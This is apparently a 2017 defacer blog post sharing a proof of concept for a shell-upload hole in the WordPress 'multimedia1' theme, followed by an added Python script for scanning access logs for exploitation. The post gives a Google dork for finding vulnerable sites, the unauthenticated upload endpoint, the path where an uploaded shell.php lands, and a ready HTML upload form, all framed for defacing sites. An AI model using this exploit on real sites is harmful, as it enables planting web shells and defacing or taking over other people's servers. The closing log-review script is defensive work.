Deface Wordpress Themes Multimedia1

By Berandal - Thursday, March 30, 2017

Hello, friends of maxteroit. This time I (Berandal) will share my new PoC about defacing WordPress; the method is the WordPress themes multimedia1 shell upload vulnerability.
Here is the documentation that I uploaded to a site for publishing hacking PoCs:

   
Wordpress Themes Multimedia1 Shell Upload Vulnerability | CSRF
Author : Berandal
Google Dork: inurl:/wp-content/themes/multimedia1/
Tested on: Win 7, Linux
Blog : http://www.maxteroit.com/

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

[!] Exploit : http://127.0.0.1/wp-content/themes/multimedia1/server/php/

[!] File Location : http://127.0.0.1/wp-content/themes/multimedia1/server/php/files/shell.php
[*] CSRF:
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/multimedia1/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>


[*] ABOUT:

Facebook: https://www.facebook.com/owlsquad.id
Twitter: https://www.twitter.com/id_berandal
Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.
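
For site owners checking whether the upload handler described above has been touched, here is a log-review sketch; it is an added example, not part of the original advisory. It assumes common/combined-format access logs; the extension list, function names and sample log lines are constructed for illustration, and only the two theme paths come from the advisory.

```python
import posixpath
import re
from urllib.parse import unquote

# Paths taken from the advisory above; everything else here is an assumption.
UPLOAD_DIR = "/wp-content/themes/multimedia1/server/php"
FILES_DIR = UPLOAD_DIR + "/files"
# Extensions PHP handlers commonly execute (assumed list; match your server config).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)")
# Common/combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                      r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def normalise(target):
    """Drop the query string, percent-decode, resolve ./ ../ and // forms, lowercase."""
    path = unquote(target.split("?", 1)[0])
    return posixpath.normpath("/" + path.lstrip("/")).lower()

def classify(line):
    """Return a finding dict for a request under the theme's upload handler, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    path = normalise(m["target"])
    if path != UPLOAD_DIR and not path.startswith(UPLOAD_DIR + "/"):
        return None
    in_files = path.startswith(FILES_DIR + "/")
    if in_files and SCRIPT_EXT.search(path[len(FILES_DIR):]):
        kind = "script-request"   # a stored file with an executable extension was requested
    elif m["method"] == "POST" and not in_files:
        kind = "upload-attempt"   # POST to the handler directory named in the advisory
    else:
        kind = "probe"            # any other request into the handler directory
    return {"ip": m["ip"], "time": m["ts"], "kind": kind, "path": path,
            "served": 200 <= int(m["status"]) < 300}

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Mar/2017:10:01:02 +0000] "GET /wp-content/themes/multimedia1/server/php/ HTTP/1.1" 200 48 "-" "-"',
    '203.0.113.7 - - [30/Mar/2017:10:01:09 +0000] "POST /wp-content/themes/multimedia1//server/php/ HTTP/1.1" 200 310 "-" "-"',
    '203.0.113.7 - - [30/Mar/2017:10:01:15 +0000] "GET /wp-content/themes/multimedia1/server/php/files/shell.php?x=1 HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.20 - - [30/Mar/2017:10:02:00 +0000] "GET /wp-content/themes/multimedia1/server/php/files/S%68ell.PHP HTTP/1.1" 404 210 "-" "-"',
    '198.51.100.9 - - [30/Mar/2017:10:03:00 +0000] "GET /wp-content/themes/multimedia1/style.css HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A "script-request" finding with "served" set to True is the one to triage first: it means a script-type file under files/ was returned with a 2xx status, so the directory contents and the requesting address need review.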
